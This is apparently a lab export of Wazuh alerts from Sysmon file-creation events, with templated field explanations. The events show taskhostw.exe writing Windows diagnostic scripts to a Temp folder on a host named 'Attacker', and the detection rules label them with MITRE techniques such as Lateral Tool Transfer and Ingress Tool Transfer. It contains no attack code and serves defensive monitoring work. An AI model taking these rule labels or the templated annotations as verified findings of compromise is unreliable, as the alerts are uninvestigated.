data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\CL_Utility.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.099 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.534988 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1250326Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215897 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.123
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\DiagPackage.dll
CreationUtcTime: 2025-04-17 16:47:59.123
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.123 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\DiagPackage.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.123 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.537612 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1316901Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215898 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.128
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_AdminDiagnosticHistory.ps1
CreationUtcTime: 2025-04-17 16:47:59.128
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.128 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_AdminDiagnosticHistory.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.128 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.540307 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1463736Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215900 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.145
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_MachineWERQueue.ps1
CreationUtcTime: 2025-04-17 16:47:59.145
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.145 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_MachineWERQueue.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.145 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.542974 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1541658Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215902 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.152
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_SyncSystemTime.ps1
CreationUtcTime: 2025-04-17 16:47:59.152
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.152 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_SyncSystemTime.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.152 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.545637 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1641125Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215905 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.162
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_UserDiagnosticHistory.ps1
CreationUtcTime: 2025-04-17 16:47:59.162
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.162 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_UserDiagnosticHistory.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.162 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.548328 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1720606Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215906 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.164
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\RS_UserWERQueue.ps1
CreationUtcTime: 2025-04-17 16:47:59.164
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.164 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\\RS_UserWERQueue.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-17 16:47:59.164 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Scripting file created under Windows Temp or User folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92200 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059', 'T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution', 'Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Command and Scripting Interpreter', 'Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533981.550983 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:47:59.1781228Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 215907 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-17 16:47:59.173
ProcessGuid: {94294ddc-4855-6800-0605-000000000e00}
ProcessId: 8224
Image: C:\WINDOWS\system32\taskhostw.exe
TargetFilename: C:\Windows\Temp\SDIAG_793f0fe6-b720-46da-957f-85c14eacec92\TS_DiagnosticHistory.ps1
CreationUtcTime: 2025-04-17 16:47:59.170
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-17 16:47:59.173 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-4855-6800-0605-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8224 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\system32\\taskhostw.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
